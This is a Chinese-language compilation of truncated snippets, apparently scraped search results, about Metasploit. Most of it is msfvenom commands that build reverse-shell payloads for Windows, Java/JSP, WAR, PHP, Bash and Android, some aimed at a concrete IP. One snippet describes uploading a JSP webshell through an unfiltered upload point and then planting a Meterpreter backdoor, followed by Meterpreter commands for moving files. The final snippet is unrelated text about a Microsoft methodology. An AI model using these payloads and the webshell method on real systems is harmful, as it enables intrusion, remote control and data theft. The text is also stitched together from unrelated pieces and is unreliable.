比如郭Meterpreter里用到的migrate来转移到其他进程的指令的源代码就在这个目录下。(脚本模块,例如:用到的JSP.PHP都在这里。包括shell脚本也是在这里调用) Tools:包含一些有用的脚本和零散的工具。 msf 命令: exti:退出msf Modules:进入msf ?:帮助菜单,可查看用法。另一个用法:在?后面加命令(之间有空格)。 seach...
msfvenom--platform windows-p windows/meterpreter/reverse_tcp-f aspx-o payload.aspx 6、JSP msfvenom--platform java-p java/jsp_shell_reverse_tcp-f raw-o payload.jsp 7、PHP msfvenom-p php/meterpreter_reverse_tcp-f raw-o payload.php 8、BASH msfvenom-p cmd/unix/reverse_bash-f raw-o shell.s...
msfvenom -p windows/meterpreter/reverse_tcp LHOST="125.37.160.181" LPORT=443 -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST="125.37.160.181" LPORT=443 -f raw > shell.jsp msfvenom -p java/jsp_shell_reverse_tcp LHOST="125.37.160.181" LPORT=443 -f war > shell.war ...
WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war Android: msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk msfvenom命令参数1Options:2-p,--payload <payload> 指定需要使用的payload(攻击...
Executable formats:Asp、aspx、aspx-exe、axis2、dll、elf、elf-so、exe、exe-only、exe-service、exe-smallhta-psh、jar、jsp、loop-vbs、macho、msi、msi-nouac、osx-app、psh、psh-cmd、psh-net、psh-reflection、python-reflection、vba、vba-exe、vba-psh、vbs、war; ...
返现文件上传点,经测试没有任何过滤,可以直接上传任意文件,因此直接上传jsp一句话后门: 上传后返回文件路径,菜刀连接: 为了进一步做内网渗透,上传msf后门: 1、后门制作: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f ...
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下 getpid #查看当前Meterpreter Shell的进程PID ...
③JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp ④WAR msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war ...
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp #Bash: msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh ...
比较适合严肃的软件企业。外面有卖这本书的。微软也定期培训。有时又翻译成微软解决方案,这个不准确。参考资料:http://wiki.userrate.com/read.jsp?aid=10865&uid=32